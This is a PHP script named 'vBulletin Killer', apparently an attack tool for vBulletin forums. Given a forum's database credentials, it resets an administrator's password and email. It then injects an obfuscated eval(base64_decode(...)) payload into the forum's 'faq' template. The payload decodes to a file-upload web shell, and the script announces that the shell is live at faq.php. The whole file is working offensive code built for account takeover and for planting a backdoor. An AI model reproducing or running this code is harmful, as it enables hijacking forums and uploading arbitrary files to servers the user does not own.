PHP:
<html>
<title>vBulletin Killer</title>
<center>
<form method=POST action=''>
<font face='Arial' color='#000000'>Mysql Host</font><br><input value=localhost type=text name=hostname size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>DB name<br></font><input value=forum type=text name=dbname size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>DB user<br></font><input value=root type=text name=dbuser size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>DB dbpass<br></font><input value=toor type=text name=dbpass size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Table prefix<br></font><input value='' type=text name=prefix size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>User admin<br></font><input value=root type=text name=user size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>New pass admin<br></font><input value=toor type=text name=pass size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>New E-mail admin<br></font><input value=admin@tuoitreit.vn type=text name=email size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
<font face='Arial' color='#000000'>Code Shell<br></font><textarea name="data" cols="40" rows="10">$spacer_open
{${eval(base64_decode("aWYoaXNzZXQoJF9QT1NUWydTdWJtaXQnXSkpew0KICAgICRmaWxlZGlyID0gIiI7IA0KICAgICRtYXhmaWxlID0gJzIwMDAwMDAnOw0KDQogICAgJHVzZXJmaWxlX25hbWUgPSAkX0ZJTEVTWydpbWFnZSddWyduYW1lJ107DQogICAgJHVzZXJmaWxlX3RtcCA9ICRfRklMRVNbJ2ltYWdlJ11bJ3RtcF9uYW1lJ107DQogICAgaWYgKGlzc2V0KCRfRklMRVNbJ2ltYWdlJ11bJ25hbWUnXSkpIHsNCiAgICAgICAgJGFib2QgPSAkZmlsZWRpci4kdXNlcmZpbGVfbmFtZTsNCiAgICAgICAgQG1vdmVfdXBsb2FkZWRfZmlsZSgkdXNlcmZpbGVfdG1wLCAkYWJvZCk7DQogIA0KZWNobyI8Y2VudGVyPjxiPkRvbmUgPT0+ICR1c2VyZmlsZV9uYW1lPC9iPjwvY2VudGVyPiI7DQp9DQp9DQplbHNlew0KZWNobycNCjxmb3JtIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiPjxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJpbWFnZSI+PGlucHV0IHR5cGU9IlN1Ym1pdCIgbmFtZT0iU3VibWl0IiB2YWx1ZT0iU3VibWl0Ij48L2Zvcm0+JzsNCn0="))}}{${exit()}}&
$_phpinclude_output</textarea><br>
<input type=submit value='Change' ><br>
</form></center>
</html>
<?
error_reporting(0);
$hostname = $_POST['hostname'];
$dbname = $_POST['dbname'];
$dbuser = $_POST['dbuser'];
$dbpass = $_POST['dbpass'];
$user=str_replace("\'","'",$user);
$set_user = $_POST['user'];
$pass=str_replace("\'","'",$pass);
$set_pass = $_POST['pass'];
$email=str_replace("\'","'",$email);
$set_email = $_POST['email'];
$vb_prefix = $_POST['prefix'];
$data = $_POST['data'];
$set_data .= ("$data");
$table_name = $vb_prefix."user";
$table_name2 = $vb_prefix."template";
@mysql_connect($hostname,$dbuser,$dbpass);
@mysql_select_db($dbname);
$query = 'select * from ' . $table_name . ' where username="' . $set_user . '";';
$result = mysql_query($query);
$row = mysql_fetch_array($result);
$salt = $row['salt'];
$pass1 = md5($set_pass);
$pass2 = md5($pass1 . $salt);
$querry1 = 'UPDATE ' . $table_name . ' SET password="' . $pass2 . '" WHERE username="' . $set_user . '";';
$querry2 = 'UPDATE ' . $table_name . ' SET email="' . $set_email . '" WHERE username="' . $set_user . '";';
$querry3 = 'UPDATE ' . $table_name2 . ' SET template ="' . $set_data . '" WHERE title = "faq";';
$ok1=@mysql_query($querry1);
$ok1=@mysql_query($querry2);
$ok1=@mysql_query($querry3);
if($ok1){
echo "<script>alert('vBulletin info changed and Shell available is faq.php :)');</script>";
}
?>